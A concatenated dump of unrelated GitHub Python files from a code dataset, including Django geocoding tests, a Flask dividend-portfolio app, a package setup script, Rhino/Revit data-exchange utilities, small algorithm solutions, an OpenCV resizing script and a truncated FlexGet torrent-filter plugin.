u\"IL\",\n \"city\" : u\"ירושלים\",\n \"street_address\" : u\"אליעזר וחמדה בן יהודה\",\n \"house_number\" : u\"35\",\n \"lon\" : '35.214161',\n \"lat\" : '31.780725',\n },\n )\n \n logging.info(\"\\nTesting geo coding\")\n for test_case in test_data:\n test_case_success = False\n\n address = test_case[\"address\"]\n logging.info(\"Testing geo coding for %s\" % address)\n geo_code = geocode(address)\n self.assertTrue(geo_code, msg=\"no geo code received for %s\" % address)\n\n # geo_code may contain more than one location. Check that at least one is correct.\n for location in geo_code:\n location_success = True\n logging.info(\"Processing location %s\" % location[\"description\"])\n\n # textual properties, compare lowercase\n for property in [\"country\", \"city\", \"street_address\", \"house_number\"]:\n result = \"OK\"\n if not test_case[property].lower() == location[property].lower():\n result = \"failed\"\n location_success = False\n #uncomment for debug since all Django tests run with DEBUG=False\n #logging.info(\"comparing %s: %s\" % (property, result))\n\n # numerical properties, allowed to differ a bit.\n precision = 0.001\n result = \"OK\"\n for property in [\"lon\", \"lat\"]:\n if not abs(float(test_case[property]) - float(location[property])) < precision:\n result = \"failed\"\n location_success = False\n #logging.info(\"comparing %s with precision %f: %s\" % (property, precision, result))\n\n if location_success:\n logging.info(\"Found correct location at %s\" % location[\"description\"])\n test_case_success = True\n break\n\n self.assertTrue(test_case_success, msg=\"correct geo code was not found for %s\" % address)\n\n\n def test_geo_distance(self):\n \"\"\"\n Test geo distance calculation. Taken from Jan Matuschek's article.\n \"\"\"\n logging.info(\"\\nTesting geo distance liberty to eiffel\")\n # distance is about 5837 km, check 3 decimal places\n d = distance_between_points(40.6892, -74.0444, 48.8583, 2.2945)\n expected_d = 5837.413\n self.assertAlmostEqual(d, expected_d, places=3, msg=\"geo distance error %f (expected %f)\" % (d, expected_d))\n\n def test_geo_hash(self):\n \"\"\"\n Simple geo hasing test.\n \"\"\"\n logging.info(\"\\nTesting geohash encode/decode.\")\n points = ({\"lat\" :\"31.776933\",\n \"lon\" :\"35.234376\",\n \"hash_code\" :\"sv9hcbbfh3wu\"},\n {\"lat\" :\"21.424172\",\n \"lon\" :\"39.826112\",\n \"hash_code\" :\"sgu3fk0kzejk\"},\n )\n for p in points:\n self.assertEqual(geohash_encode(float(p[\"lon\"]),float(p[\"lat\"])), p[\"hash_code\"], msg=\"encode error\")\n self.assertEqual(geohash_decode(p[\"hash_code\"]), (p[\"lat\"],p[\"lon\"]), msg=\"decode error\")\n\n\nclass RouteTest(TestCase):\n \"\"\"\n Unit test for route estimation (time and distance).\n \"\"\"\n\n def setUp(self):\n # error margins to take into account traffic noise.\n self.ERR_RATIO = 0.4\n\n self.test_data = (\n {\"p0\" : \"Yishayahu 60 Tel Aviv\",\n \"p1\" : \"Rotschild 19 Tel Aviv\",\n \"p0_lon\" : '34.78099',\n \"p0_lat\" : '32.09307',\n \"p1_lon\" : '34.77127',\n \"p1_lat\" : '32.06355',\n \"expected_t\" : '768',\n \"expected_d\" : '4110'\n },\n {\"p0\" : \"Tarsish 17 Or Yehuda\",\n \"p1\" : \"Margolin 15 Tel Aviv\",\n \"p0_lon\" : '34.859405',\n \"p0_lat\" : '32.028877',\n \"p1_lon\" : '34.790611',\n \"p1_lat\" : '32.05856',\n \"expected_t\" : '900',\n \"expected_d\" : '12000'\n }\n )\n\n def test_calculate_time_and_distance(self):\n for test_case in self.test_data:\n logging.info(\"Testing route from %s (p0) to %s (p1)\" % (test_case[\"p0\"], test_case[\"p1\"]))\n estimation = calculate_time_and_distance(test_case[\"p0_lon\"], test_case[\"p0_lat\"], test_case[\"p1_lon\"], test_case[\"p1_lat\"])\n\n t, d = float(estimation[\"estimated_duration\"]), float(estimation[\"estimated_distance\"])\n expected_t, expected_d = float(test_case[\"expected_t\"]), float(test_case[\"expected_d\"])\n\n logging.info(\"Time received: %d (expected %d)\" % (t, expected_t))\n self.assertTrue(1 - self.ERR_RATIO < t/expected_t < 1 + self.ERR_RATIO)\n\n logging.info(\"Distance received: %d (expected %d)\" % (d, expected_d))\n self.assertTrue(1 - self.ERR_RATIO < d/expected_d < 1 + self.ERR_RATIO)\n\n\nclass Urllib2AdaptorTest(TestCase):\n def test_fetch_url(self):\n content = urllib2.urlopen(\"http://www.google.com\")\n self.assertTrue(\"google\" in str(content))\n\n def test_content_read(self):\n response = urllib2.urlopen(\"http://www.google.com\")\n content = response.read()\n self.assertTrue(\"google\" in content)\n\n def test_request_headers(self):\n mobile_str = \"mobile.twitter.com\"\n url = \"http://www.twitter.com\"\n request = urllib2.Request(url,\n headers={\"USER_AGENT\": \"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/1A542a Safari/419.3\"})\n\n content = urllib2.urlopen(request)\n self.assertTrue(mobile_str in str(content))\n\n request = urllib2.Request(url)\n content = urllib2.urlopen(request)\n self.assertTrue(mobile_str not in str(content))\n\n\nclass BasicFuncTest(TestCase):\n \"\"\"\n Test basic functionality provided by common app.\n \"\"\"\n\n fixtures = ['countries.yaml']\n \n def test_send_sms(self):\n logging.info(\"\\nTesting sms sending\")\n self.assertTrue(send_sms('0526342974', 'sms test'), msg=\"sms send failed\")\n\n def test_code_generator(self):\n logging.info(\"testing code generator\")\n code1 = gen_verification_code()\n code2 = gen_verification_code()\n self.assertTrue(code1!=code2, \"same verification code is generated\")\n\n def test_is_email_available(self):\n logging.info(\"\\nTesting username available\")\n from django.contrib.auth.models import User\n test_user = User()\n test_user.username = \"test_user1\"\n test_user.email = \"test_user1@wayebtter.com\"\n test_user.save()\n\n response = self.client.get(reverse('common.services.is_email_available'), {\"email\": \"test_user1@wayebtter.com\"})\n self.assertTrue(response.content == \"false\", msg=\"expected username unavailable\")\n\n response = self.client.get(reverse('common.services.is_email_available'), {\"email\": \"test_user2@wayebtter.com\"})\n self.assertTrue(response.content == \"true\", msg=\"expected username unavailable\")\n\n","repo_name":"WAYbetter/waybetter","sub_path":"common/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":9061,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31040795","text":"from app.services.steam.steam_api import SteamAPI\n\n\nclass SteamFriends:\n \"\"\"Helps find friends of a steam user\"\"\"\n\n def __init__(self) -> None:\n self.steam_client = SteamAPI()\n\n async def get_friends_with_include(self, steamid: int | str, include: list[str]) -> list[str]:\n friends = await self.steam_client.get_player_friend_list(steamid)\n freinds_include = [friend for friend in friends if friend.steamid in include]\n return [friend.steamid for friend in freinds_include]\n\n async def find_parties(self, steamids: list[str], include: list[str]) -> list[list[str]]:\n parties: dict[str, set[str]] = {}\n for steamid in steamids:\n parties[steamid] = set(await self.get_friends_with_include(steamid, include))\n\n remove_keys = []\n for player_steamid, player_friends in parties.items():\n for friend_steamid in player_friends:\n if friend_steamid in remove_keys:\n continue\n parties[player_steamid] = player_friends.union(parties[friend_steamid])\n remove_keys.append(friend_steamid)\n\n result = []\n for owner, party in parties.items():\n if not party or owner in remove_keys:\n continue\n result.append([owner, *party])\n\n return result\n","repo_name":"MagicRustHelper/backend","sub_path":"app/services/steam/steam_friends.py","file_name":"steam_friends.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37575085747","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\nimport pandas as pd\nimport numpy as np\nimport yfinance as yf\nfrom flask_dance.contrib.google import make_google_blueprint, google\n\n# Create the Flask app\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///portfolio.db'\napp.config['SECRET_KEY'] = 'secret-key-goes-here'\ndb = SQLAlchemy(app)\n\n# Define a list of stocks to analyze\nstocks = ['AAPL', 'MSFT', 'JNJ', 'VZ', 'T', 'KO', 'PEP', 'PG', 'MMM', 'XOM']\n\n# Configure Google OAuth\nblueprint = make_google_blueprint(client_id='client-id-goes-here', client_secret='client-secret-goes-here', offline=True, scope=['profile', 'email'])\napp.register_blueprint(blueprint, url_prefix='/login')\n\nclass Stock(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n symbol = db.Column(db.String(10), nullable=False)\n quantity = db.Column(db.Integer, nullable=False)\n cost_basis = db.Column(db.Float, nullable=False)\n\n# Define the routes\n@app.route(\"/\")\ndef index():\n # If the user is not logged in, redirect to the login page\n if not google.authorized:\n return redirect(url_for('google.login'))\n \n # Get the user's information from Google\n resp = google.get(\"/oauth2/v1/userinfo\")\n assert resp.ok, resp.text\n email = resp.json()['email']\n \n # Create an empty dataframe to store the stock data\n dividend_data = pd.DataFrame(columns=['Stock', 'Dividend Yield', 'Payout Ratio'])\n \n # Loop through the list of stocks, download the stock data from Yahoo Finance,\n # and calculate the dividend yield and payout ratio\n for stock in stocks:\n ticker = yf.Ticker(stock)\n data = ticker.history(period=\"max\")\n latest_close_price = data['Close'][-1]\n dividend = ticker.dividends\n dividend_yield = np.mean(dividend) / latest_close_price\n net_income = ticker.earnings\n payout_ratio = np.mean(dividend) / np.mean(net_income)\n dividend_data = dividend_data.append({'Stock': stock, 'Dividend Yield': dividend_yield, 'Payout Ratio': payout_ratio}, ignore_index=True)\n \n # Sort the dataframe by dividend yield and convert to HTML table\n dividend_data = dividend_data.sort_values(by=['Dividend Yield'], ascending=False)\n dividend_table = dividend_data.to_html(index=False)\n \n # Retrieve the list of stocks in the portfolio for the current user and calculate the total value\n portfolio = Stock.query.filter_by(email=email).all()\n portfolio_value = 0\n for stock in portfolio:\n ticker = yf.Ticker(stock.symbol)\n data = ticker.history(period=\"max\")\n latest_close_price = data['Close'][-1]\n stock_value = stock.quantity * latest_close_price\n portfolio_value += stock_value\n \n # Render the HTML template with the dividend table and portfolio\n return render_template('index.html', dividend_table=dividend_table, portfolio=portfolio, portfolio_value=portfolio_value)\n\n\nif __name__ == '__main__':\n db.create_all()\n app.run(debug=True)\n\n","repo_name":"cidambic/divPortolio","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37424445749","text":"from setuptools import setup, find_packages\n\n\ndef get_version(package_path):\n import os\n from importlib.util import module_from_spec, spec_from_file_location\n\n spec = spec_from_file_location(\"version\", os.path.join(package_path, \"_version.py\"))\n module = module_from_spec(spec)\n spec.loader.exec_module(module)\n version = module.get_version_from_static()\n return version\n\n\nversion = get_version(\"ersilia\")\n\n\nwith open(\"README.md\", \"r\", encoding=\"utf8\") as fh:\n long_description = fh.read()\n\n# Slim requirements\nslim = [\n \"inputimeout\",\n \"emoji\",\n \"validators\",\n \"h5py\",\n \"loguru\",\n \"pyairtable<2\",\n \"PyYAML\",\n \"dockerfile-parse\",\n \"tqdm\",\n \"click\",\n \"docker\",\n]\nslim_requires = slim\n\n# Lake requirements\nlake_requires = slim_requires + [\"isaura==0.1\"]\n\n# Doc builder requirements\ndoc_builder_requires = slim + [\"sphinx\", \"jinja2\"]\n\n# Test requirements\ntest_requires = slim + [\"pytest\", \"fuzzywuzzy\"]\n\n# Define extras requires\nextras_require = {\n \"lake\": lake_requires,\n \"docs\": doc_builder_requires,\n \"test\": test_requires,\n}\n\nsetup(\n name=\"ersilia\",\n version=version,\n author=\"Ersilia Open Source Initiative\",\n author_email=\"hello@ersilia.io\",\n url=\"https://github.com/ersilia-os/ersilia\",\n description=\"A hub of AI/ML models for open source drug discovery and global health\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license=\"GPLv3\",\n python_requires=\">=3.7\",\n install_requires=slim_requires,\n extras_require=extras_require,\n packages=find_packages(),\n entry_points={\"console_scripts\": [\"ersilia=ersilia.cli:cli\"]},\n classifiers=[\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: OS Independent\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n ],\n keywords=\"drug-discovery machine-learning ersilia open-science global-health model-hub infectious-diseases\",\n project_urls={\n \"Landing page\": \"https://ersilia.io\",\n \"Models\": \"https://ersilia.io/model-hub\",\n \"Source Code\": \"https://github.com/ersilia-os/ersilia/\",\n },\n package_data={\"ersilia\": [\"hub/content/metadata/*.txt\"]},\n include_package_data=True,\n)\n\n\n# Install bentoml if necessary\ndef check_bentoml(package_path):\n import os\n from importlib.util import module_from_spec, spec_from_file_location\n\n spec = spec_from_file_location(\n \"bentoml_requirement\",\n os.path.join(package_path, \"setup\", \"requirements\", \"bentoml.py\"),\n )\n module = module_from_spec(spec)\n spec.loader.exec_module(module)\n req = module.BentoMLRequirement()\n if not req.is_bentoml_ersilia_version():\n req.install()\n return version\n\n\ncheck_bentoml(\"ersilia\")\n","repo_name":"ersilia-os/ersilia","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"37"} +{"seq_id":"42089293012","text":"import math\n\n# 시험장의 개수\nn = int(input())\n# 각 시험장에 있는 응시자 수\ncandidate = list(map(int, input().split()))\n# b=총감독관, c=부감독관\nb, c = map(int, input().split())\n\n# 필요한 감독관의 최소 수\nresult = 0\nfor cand in candidate:\n # 총감독관 혼자 감독이 가능한 상황이라면\n if cand <= b:\n result += 1\n # 부감독관도 필요한 상황이라면\n else:\n result += math.ceil((cand-b) / c) + 1\n\nprint(result)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/코테재활/삼성 역테 재활/solution73.py","file_name":"solution73.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"43055153658","text":"\"\"\"\npyVersion = IronPython 2.7xx and Python 3.7xx\n\nThese classes are compatible with both Rhino and Revit\nand are meant to assist in exchanging data between\nthese platforms, or between any program and the OS.\n\nEach data tool is an object with accessible\nmethods therein which can be linked together. There is\nno main function and nothing will run without being\nexplicitly instantiated\n\nBecause this is meant to be used in both Python3 and\nironPython precautions must be taken in the code!\n\"\"\"\n# UNIVERSAL MODULES\nimport traceback\nimport sys\n\ntry:\n sys.path.append(r\"C:\\Program Files (x86)\\IronPython 2.7\\Lib\")\nexcept:\n sys.path.append(r\"C:\\Program Files\\IronPython 2.7\\Lib\")\nimport json \n\n#import collections\n#from collections import Sequence\nfrom itertools import chain, count\n\nimport csv\nimport os\n\n# .NET MODULES\nif \"2.\" and \"IronPython\" in sys.version:\n import clr\n \n #clr.AddReference('msgpack.dll')\n #import msgpack\n \n # imports for Revit API\n clr.AddReference('RevitAPI')\n clr.AddReference('RevitAPIUI')\n from Autodesk.Revit.DB import *\n from Autodesk.Revit.UI import * \n\n# PYTHON 3 MODULES\nelif \"3.\" in sys.version:\n sys.path.append(r\"C:\\Users\\aluna\\AppData\\Local\\Programs\\Python\\Python37\\Lib\")\n import ujson\n import msgpack\n\nclass FilePathTools:\n def __init__(self):\n self.targetDirectory = None\n\n def CurrentFilePath(self):\n return(os.path.abspath(__file__))\n\n def CurrentFileDirectory(self):\n return(os.path.dirname(self.CurrentFilePath()))\n\n def CurrentUserDesktopPath(self):\n return(os.path.expanduser(\"~\\Desktop\"))\n \n def CurrentUser(self):\n return(os.path.expanduser(\"~\"))\n\n def ShiftFilePath(self, path, branchesBack=1, append=None):\n pathReverse = path[::-1]\n newPathReverse = pathReverse.split('\\\\', branchesBack)[-1]\n newPath = newPathReverse[::-1]\n \n # always write append string as r\"\" - set as variable\n if type(append) is str: return(r\"{0}\\{1}\".format(newPath, append))\n\n# data prep for JSON AND CSV modules\nclass DataPrep:\n def __init__(self):\n pass\n\n def GroupNthItemList(self, data, groupSize):\n dataOut = []\n for building in data:\n count = 0\n for facadeIndex in range(len(building)):\n anotherNest = []\n facadesTempList = []\n\n # group facades in sub lists by looping through groupSize\n for groupIndex in range(groupSize):\n masterIndex = (facadeIndex + groupIndex + count)\n if masterIndex <= (len(building) - 1):\n facadesTempList.append(building[masterIndex])\n if len(facadesTempList) > 0:\n count += (groupSize - 1)\n\n # still dont understand why this i needed...group the groups?\n anotherNest.append(facadesTempList)\n dataOut.append(anotherNest)\n return(dataOut)\n\nclass JSONTools:\n \"\"\"\n This class works for both Python2,3 and IronPython\n\n fileName and filePath are separated to simply the assignment\n of creating files in specific, but common locations by allowing\n keywords that the code recognizes to create a long path string.\n This to prevent the manual copying and pasting process.\n \"\"\"\n def __init__(self):\n # instantiate FilePathTools Class\n self.pathObj = FilePathTools()\n \n def WriteJSON(self, data, filePath=None, fileName=None):\n # file path operations or something\n if not fileName: fileName = \"randoJSON\" \n if filePath == None: filePath = self.pathObj.CurrentUserDesktopPath()\n elif filePath == 'current': filePath = self.pathObj.CurrentFileDirectory()\n elif filePath == 'Lib': self.filePath = None\n completeFilePath = r\"{0}\\{1}.json\".format(filePath, fileName)\n \n # write json\n with open(completeFilePath, 'w') as writePath:\n JSONdump = json.dump(data, writePath)\n \n return(JSONdump)\n \n def Write_MSGPACK(self, data, filePath=None, fileName=None):\n if fileName == None: fileName = \"randoMSGPACK\"\n \n if filePath == None: filePath = self.pathObj.CurrentUserDesktopPath()\n elif filePath == 'current': filePath = self.pathObj.CurrentFileDirectory()\n elif filePath == 'Lib': self.filePath = None\n \n completeFilePath = r\"{0}\\{1}.msgpack\".format(filePath, fileName)\n \n # Write msgpack file\n with open(completeFilePath, 'w') as writePath:\n msgpack.pack(data, writePath) \n\n def ReadJSON(self, filePath=None):\n if filePath == None: raise Exception(\"Complete path must be used!\")\n\n with open(filePath, 'r') as read:\n dataOut = json.load(read)\n return(dataOut)\n \n def Read_UJSON(self, filePath=None):\n if filePath == None: raise Exception(\"Complete path must be used!\")\n \n with open(filePath, 'r') as read:\n dataOut = ujson.load(read)\n return(dataOut)\n \n def Read_MSGPACK(self, filePath=None):\n if filePath == None: raise Exception(\"Complete path must be used!\")\n \n with open(filePath, 'r') as read:\n dataOut = msgpack.unpack(read)\n return(dataOut)\n \n \nclass CSVTools:\n \"\"\"\n data assumes data is single column, if more than one column then you can make iterable\n \"\"\"\n def __init__(self, fileName=None, filePath=None):\n # instantiate FilePathTools Class\n self.pathObj = FilePathTools() \n\n self.fileName = fileName\n self.filePath = filePath\n\n # default file write locations and keyword options\n if self.fileName == None: self.fileName = \"randoCSV\"\n\n if self.filePath == None: self.filePath = FilePathTools().CurrentUserDesktopPath()\n elif self.filePath == 'current': self.filePath == FilePathTools().CurrentFileDirectory()\n elif self.filePath == 'Lib': self.filePath = None \n\n def ReadCSV(self, row=True, cellStart=None, cellEnd=None):\n # cellStart = (row#, column#)\n\n # assume fileName contiains full path, unless files are saved in same location\n with open(self.fileName, mode='r') as csvFile:\n # read rows\n if row == True:\n csvReader = csv.reader(csvFile, delimiter=',')\n csvData = [i for i in csvReader]\n\n # read columns\n elif row == False:\n csvReader = csv.reader(csvFile, delimiter=',')\n csvData = [i for i in zip(*csvReader)]\n\n return(csvData)\n\n def WriteCSV(self, data, row=True, cellStart=None, cellEnd=None):\n # cellStart = (row#, column#)\n\n completeFilePath = \"{0}/{1}.csv\".format(self.filePath, self.fileName)\n\n with open(completeFilePath, mode='w') as csvFile:\n writerObj = csv.writer(csvFile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n # write row\n if row == True:\n for i in data:\n writerObj.writerow(i)\n\n # write column\n elif row == False:\n data2 = zip(data)\n for i in data2:\n writerObj.writerow([i])\n return(None)\n\n def WriteCSV2(self, data, cellStart=None, cellEnd=None):\n # cellStart = (row#, column#)\n print('hello world')\n inPath = \"{0}/{1}.csv\".format(self.filePath, 'in')\n outPath = \"{0}/{1}.csv\".format(self.filePath, 'out')\n\n in_file = open(inPath, mode='r')\n reader = csv.reader(in_file)\n\n myList = list(reader)\n in_file.close()\n\n print(myList)\n\n #myList[2][0] = 'cat'\n #myNewList = open(outPath, mode='w', newline='')\n #writer = csv.writer(myNewList)\n #writer.writerows(myList)\n #myNewList.close() \n\nclass SQLTools:\n \"\"\"\n This class only works in Python 2 & 3. Not implimented for ironPython.\n Please call subprocess to use within Rhino or Revit. \n \"\"\"\n def __init__(self):\n import sqlite3\n pass\n\n def WriteDB(self):\n pass\n\n def UpdateDB(self):\n pass \n\n def ReadDB(self):\n pass\n\n\nclass GRASSHOPPERTools:\n def __init__(self):\n pass\n\n def DEPRECATED(self, raggedList):\n # Grasshopper imports\n import clr\n clr.AddReference(\"Grasshopper\")\n from Grasshopper import DataTree\n from Grasshopper.Kernel.Data import GH_Path\n\n from System import Array\n from System import Object\n\n\n rl = raggedList\n result = DataTree[object]()\n for i in range(len(rl)):\n temp = []\n for j in range(len(rl[i])):\n temp.append(rl[i][j])\n #print i, \" - \",temp\n path = GH_Path(i)\n result.AddRange(temp, path)\n return(result)\n\n def NestedListToDataTree(self, input, none_and_holes=True, source=[0]):\n # Grasshopper imports\n import clr\n clr.AddReference(\"Grasshopper\")\n from Grasshopper import DataTree\n from Grasshopper.Kernel.Data import GH_Path\n\n from System import Array\n from System import Object\n\n def proc(input,tree,track):\n path = GH_Path(Array[int](track))\n if len(input) == 0 and none_and_holes: tree.EnsurePath(path); return\n for i,item in enumerate(input):\n if hasattr(item, '__iter__'): # if list or tuple\n track.append(i); proc(item,tree,track); track.pop()\n else:\n if none_and_holes: tree.Insert(item,path,i)\n elif item is not None: tree.Add(item,path)\n if input is not None: t=DataTree[object]();proc(input,t,source[:]);return t\n\n def DataTreeToNestedList(self, aTree):\n # Grasshopper imports\n import clr\n clr.AddReference(\"Grasshopper\")\n from Grasshopper import DataTree\n from Grasshopper.Kernel.Data import GH_Path\n\n from System import Array\n from System import Object\n\n\n theList = []\n for i in range(aTree.BranchCount ):\n thisListPart = []\n thisBranch = aTree.Branch(i)\n for j in range(len(thisBranch)):\n thisListPart.append( thisBranch[j] )\n theList.append(thisListPart)\n return(theList)\n\nclass ListTools:\n def __init__(self):\n pass\n\n #def ListDepth(self, dataList):\n #dataList = iter(dataList)\n #try:\n #for level in count():\n #dataList = chain([next(dataList)], dataList)\n #dataList = chain.from_iterable(s for s in dataList if isinstance(s, Sequence))\n\n ## do not recognize the formatting after except\n #except StopIteration:\n #return(level)\n ## yield from is not ironpython safe???\n #def MissingNumbersInSequence(numList, start, end):\n ## very advanced formatting, is this recursion?\n #if end - start <= 1: \n #if numList[end] - numList[start] > 1:\n #yield from range(numList[start] + 1, numList[end])\n #return\n\n #index = start + (end - start) // 2\n\n ## is the lower half consecutive?\n #consecutive_low = numList[index] == numList[start] + (index - start)\n #if not consecutive_low:\n #yield from MissingNumbersInSequence(numList, start, index)\n\n ## is the upper part consecutive?\n #consecutive_high = numList[index] == numList[end] - (end - index)\n #if not consecutive_high:\n #yield from MissingNumbersInSequence(numList, index, end)\n\n return(False)\n\nclass RangeDict(dict):\n def __getitem__(self, item):\n if type(item) != range: # or xrange in Python 2\n for key in self:\n if item in key:\n return(self[key])\n else:\n return(super().__getitem__(item))\n\ndef frange(start, stop=None, step=None):\n # use float number in range() function\n \n # if stop and step argument is null set start=0.0 and step=1.0\n if stop == None:\n stop = start + 0.0\n start = 0.0\n \n if step == None:\n step = 1.0\n \n while True:\n if step > 0 and start >= stop:\n break\n elif step < 0 and start <= stop:\n break\n yield(\"{0}\".format(start))\n start = start + step\n\ndef frange2(x, y, jump):\n while x < y:\n yield x\n x += jump \n\ndef TestMain():\n ### csv write\n ###data = ['cat', 'dog', 'rabbit', 'dolphin', 7]\n ###csvWriteData = CSVTools().WriteCSV(data, False)\n ###print(csvWriteData)\n\n ###csvWriteData2 = CSVTools().WriteCSV2(data)\n ###print(csvWriteData2) \n\n ###csvFilePath = r\"C:\\Users\\aluna\\Downloads\\Memorial Weekend - Sheet1.csv\"\n ###csvReadData = CSVTools(csvFilePath).ReadCSV(False)\n ###print(csvReadData)\n \n #aDict = {frange2(1.0,3.0,.1): \"dog\",\n #frange2(3.0,float(sys.maxsize), .1) : \"CAT\"\n #}\n \n #rangObj = RangeDict(aDict)\n #print(rangObj[2.999])\n \n print(FilePathTools().CurrentUser())\n \n pass\n \n\nif __name__ == \"__main__\":\n TestMain()","repo_name":"tkahng/pyWest","sub_path":"pyWest.extension/pyWest.tab/lib/WW_DataExchange.py","file_name":"WW_DataExchange.py","file_ext":"py","file_size_in_byte":13283,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"73327010346","text":"import cv2 as cv\n\ndef rescaleFrame(frame, scale = 0.5):\n\n width = int(frame.shape[1]*scale)\n height = int(frame.shape[0]*scale)\n\n dimensions = (width, height)\n\n return cv.resize(frame, dimensions, interpolation=cv.INTER_AREA)\n\n#img = cv.imread('photos/Screen Shot 2022-01-28 at 6.26.47 PM.png')\n#cv.imshow('Photo', img)\n\n#picture = rescaleFrame(img)\n\n#cv.imshow('Resized', picture)\n\n#cv.waitKey(0)\n\ncapture = cv.VideoCapture('https://media.tenor.co/videos/5bc3c822e7d615de68163bc14ad0d0b4/mp4')\nwhile True:\n #ret, frame = capture.read()\n ret, frame = capture.read() \n\n frame_resize = rescaleFrame(frame)\n if ret:\n cv.imshow(\"Image\", frame)\n else:\n print('no video')\n capture.set(cv.CAP_PROP_POS_FRAMES, 0)\n\n if cv.waitKey(1) & 0xFF==ord('d'):\n break\n\ncapture.release()\ncv.destroyAllWindows()\n\n\n\n","repo_name":"nandh24/opencv-i-think","sub_path":"opencv-i-think/rescale.py","file_name":"rescale.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11900703391","text":"# https://leetcode.com/problems/product-of-array-except-self/\n\nclass Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n \n result = [0]*len(nums)\n result[0] = 1\n \n for i in range(1, len(nums)):\n result[i] = nums[i-1]*result[i-1]\n \n revRes = 1\n for i in reversed(range(len(nums))):\n result[i] = result[i]*revRes\n revRes *= nums[i]\n \n return result","repo_name":"NichHarris/leet-code","sub_path":"productExceptSelf.py","file_name":"productExceptSelf.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32605332111","text":"from django.conf.urls import url\nfrom LeongGoodApp import views as v\nurlpatterns =[\n url(r'detail/(\\d+)/',v.detail,name='detail'),\n url(r'test/',v.test1),\n url(r'list/(?P\\d+)/(?P\\d+)',v.list,name='fruite'),\n url(r'index',v.index,name='index'),\n url(r'hehehe/(\\d+)',v.heheda,name='hehehe'),\n url(r'order/',v.user_order,name='user_order'),\n url(r'cart',v.cart,name='cart'),\n url(r'place_order',v.place_order,name='place_order')\n\n\n]","repo_name":"cgsonglixin/lenong","sub_path":"lenong/LeongGoodApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15249699589","text":"from __future__ import unicode_literals, division, absolute_import\r\n\r\nimport concurrent.futures\r\n\r\nfrom flexget import plugin\r\nfrom flexget.config_schema import one_or_more\r\nfrom flexget.event import event\r\nfrom flexget.utils.soup import get_soup\r\n\r\n\r\nclass NexusPHP(object):\r\n \"\"\"\r\n task_name:\r\n rss:\r\n url: https://www.example.com/rss.xml\r\n other_fields:\r\n - link\r\n nexusphp:\r\n cookie: 'my_cookie'\r\n discount:\r\n - free\r\n - 2x\r\n seeders:\r\n min: 1\r\n max: 30\r\n leechers:\r\n min: 1\r\n max: 100\r\n max_complete: 0.8\r\n \"\"\"\r\n\r\n schema = {\r\n 'type': 'object',\r\n 'properties': {\r\n 'cookie': {'type': 'string'},\r\n 'discount': one_or_more({'type': 'string', 'enum': ['free', '2x', '2xfree', '30%', '50%', '2x50%']}),\r\n 'seeders': {\r\n 'type': 'object',\r\n 'properties': {\r\n 'min': {'type': 'integer', 'minimum': 0},\r\n 'max': {'type': 'integer', 'minimum': 0}\r\n }\r\n },\r\n 'leechers': {\r\n 'type': 'object',\r\n 'properties': {\r\n 'min': {'type': 'integer', 'minimum': 0},\r\n 'max': {'type': 'integer', 'minimum': 0},\r\n 'max_complete': {'type': 'number', 'minimum': 0, 'maximum': 1}\r\n }\r\n }\r\n },\r\n 'required': ['cookie']\r\n }\r\n\r\n def build_conifg(self, config):\r\n config = dict(config)\r\n config.setdefault('discount', None)\r\n config.setdefault('seeders', {'min': 0, 'max': 100000})\r\n config['seeders'].setdefault('min', 0)\r\n config['seeders'].setdefault('max', 100000)\r\n config.setdefault('leechers', {'min': 0, 'max': 100000, 'max_complete': 1})\r\n config['leechers'].setdefault('min', 0)\r\n config['leechers'].setdefault('max', 100000)\r\n config['leechers'].setdefault('max_complete', 1)\r\n return config\r\n\r\n @plugin.priority(-1)\r\n def on_task_filter(self, task, config):\r\n config = self.build_conifg(config)\r\n\r\n def consider_entry(_entry, _link):\r\n discount, seeders, leechers = NexusPHP._get_info(task, _link, config['cookie'])\r\n seeder_max = config['seeders']['max']\r\n seeder_min = config['seeders']['min']\r\n leecher_max = config['leechers']['max']\r\n leecher_min = config['leechers']['min']\r\n\r\n if config['discount']:\r\n if discount not in config['discount']:\r\n _entry.reject('%s does not match discount' % discount) # 优惠信息不匹配\r\n return\r\n\r\n if len(seeders) not in range(seeder_min, seeder_max + 1):\r\n _entry.reject('%d is out of range of seeder' % len(seeders)) # 做种人数不匹配\r\n 